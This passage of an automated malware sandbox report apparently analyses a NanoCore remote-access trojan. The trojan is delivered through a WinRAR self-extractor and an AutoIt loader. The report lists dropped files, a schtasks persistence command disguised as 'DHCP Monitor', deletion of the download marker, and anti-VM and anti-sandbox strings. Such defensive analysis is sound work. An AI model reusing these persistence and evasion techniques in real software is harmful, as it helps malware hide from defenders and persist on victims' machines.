Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: P05jmXYKpr.exe

Static file information: File size 1115860 > 1048576

Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: P05jmXYKpr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: P05jmXYKpr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: P05jmXYKpr.exe
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbj source: RegSvcs.exe, 0000000D.00000003.482399735.0000000001C53000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe, 0000000D.00000002.634072543.0000000001BEA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp

Source: P05jmXYKpr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: P05jmXYKpr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: P05jmXYKpr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: P05jmXYKpr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: P05jmXYKpr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096F640 push ecx; ret	0_2_0096F653
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096EB78 push eax; ret	0_2_0096EB96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002A0332 push edi; ret	7_2_002A0333
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00270E06 push ecx; ret	7_2_00270E19
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0026DBFE push eax; iretd	7_2_0026DC01
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0026DBFC push cs; iretd	7_2_0026DBFD

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_00255D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

7_2_00255D78

PE file contains sections with non-standard names

Source: P05jmXYKpr.exe

Static PE information: section name: .didat

File is packed with WinRar

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_5537109

Jump to behavior

Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release

Drops PE files

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete

Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002E25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		7_2_002E25A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0026FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		7_2_0026FC8A

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM autoit script

Source: Yara match

File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: boaliim.dat, 00000007.00000002.429505208.00000000017EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXESD
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXE
Source: boaliim.dat, 00000007.00000003.428295579.000000000182F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424245020.000000000182B000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.000000000182C000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404297594.000000000180F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.428339663.0000000001831000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425049143.000000000182E000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENH

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat TID: 7516	Thread sleep count: 64 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat TID: 7516	Thread sleep count: 186 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat TID: 7516	Thread sleep count: 125 > 30	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 8036	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: threadDelayed 9709	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: foregroundWindowGot 423	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: foregroundWindowGot 491	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

API coverage: 5.9 %

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

API call chain: ExitProcess graph end node

Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwaretray.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareUser.exe+
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareService.exej
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
